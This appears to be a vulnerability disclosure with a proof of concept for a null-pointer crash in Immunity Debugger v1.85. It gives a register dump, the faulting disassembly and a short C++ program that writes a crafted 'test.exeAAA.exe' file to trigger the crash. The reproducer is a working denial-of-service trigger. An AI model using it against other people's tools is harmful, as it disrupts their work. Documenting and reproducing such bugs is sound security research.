|
//////////////////////////////////////////////////////////////////////////////// //Title: Immunity Debugger v1.85 32-bit Memmory Corruption //Author: Ayrbyte //Link: debugger.immunityinc.com //Versi: v1.85 //Tested on: Windows 7 //Fb: facebook.com/Ayrbyte //Greetz To : R31tuz, 3|_^^1x, XerkusR, Clan X-BX, and all CREMY Family // // ?? %% %% $$$$$ >> > :: ;;;;;;;; // ?? ? %% %% $$ $$ || >> > :: ;; ;; // ????? %%%% $$$$$ ||___ >>> ::::: ;;;;;;; // ?? ?? %% $$$$ || || > :: ;; // %%%%%%%% $$ $$ ||__|| >>>>> ::::: ;;;;;;;; // ______________>>Ayrbyte<<_______________ // Gamerz From CREMY | CRazy Experience arMY //////////////////////////////////////////////////////////////////////////////// //[register] //EAX 00000000 //ECX 00000000 //EDX 0022DFE0 //EBX 0022DB70 ASCII ".exe" //ESP 0022C0C4 //EBP 0022D864 ASCII "test.exe" //ESI 0022DFB8 ASCII "C:\Users\R1d3Rw13c\Desktop\test.exeAAA.exe" //EDI 0022DFDB ASCII ".exe" //EIP 777E49F6 ntdll.777E49F6 // //[diassembly] //779349D4 test ecx,3 //779349DA je 779349F6 //779349DC mov al,byte ptr [ecx] //779349DE add ecx,1 //779349E1 test al,al //779349E3 je 77934A2B //779349E5 test ecx,3 //779349EB jne 779349DC //779349ED add eax,0 //779349F0 lea esp,[esp] //779349F3 lea esp,[esp] //779349F6 mov eax,dword ptr [ecx]; ECX=00000000 ds:[00000000]=??? <--NullPointer //779349F8 mov edx,7EFEFEFFh //779349FD add edx,eax //779349FF xor eax,0FFh //77934A02 xor eax,edx //77934A04 add ecx,4 //77934A07 test eax,81010100h //77934A0C je 779349F6 //77934A0E mov eax,dword ptr [ecx-4] // //Unhandle exception in ImmunityDebugger.exe (NTDLL.DLL):0xC0000005: Access Violation //immunity is not handle filename test.exeAAA, after .exe "AAA" is also as input, //in offset 779349f6 eax,dword ptr [ecx]; ecx is 00000000 ds:[00000000]=??? <--NullPointer //it makes program be crash ////////////////////////////////////////////////////////////////////////////////
#include <iostream> using namespace std;
char _isi[] = "\x43\x52\x45\x4D\x59\x20\x7C\x20\x43\x52\x61\x7A\x79\x20" "\x45\x78\x70\x65\x72\x69\x65\x6E\x63\x65\x20\x61\x72\x4D\x59"; int main(){ //make file test.exeAAA.exe, run it on immunity debugger FILE *_file; #define _namefile "test.exeAAA.exe" _file = fopen(_namefile, "w"); fputs(_isi, _file); fclose(_file); return 0; }
|
|
|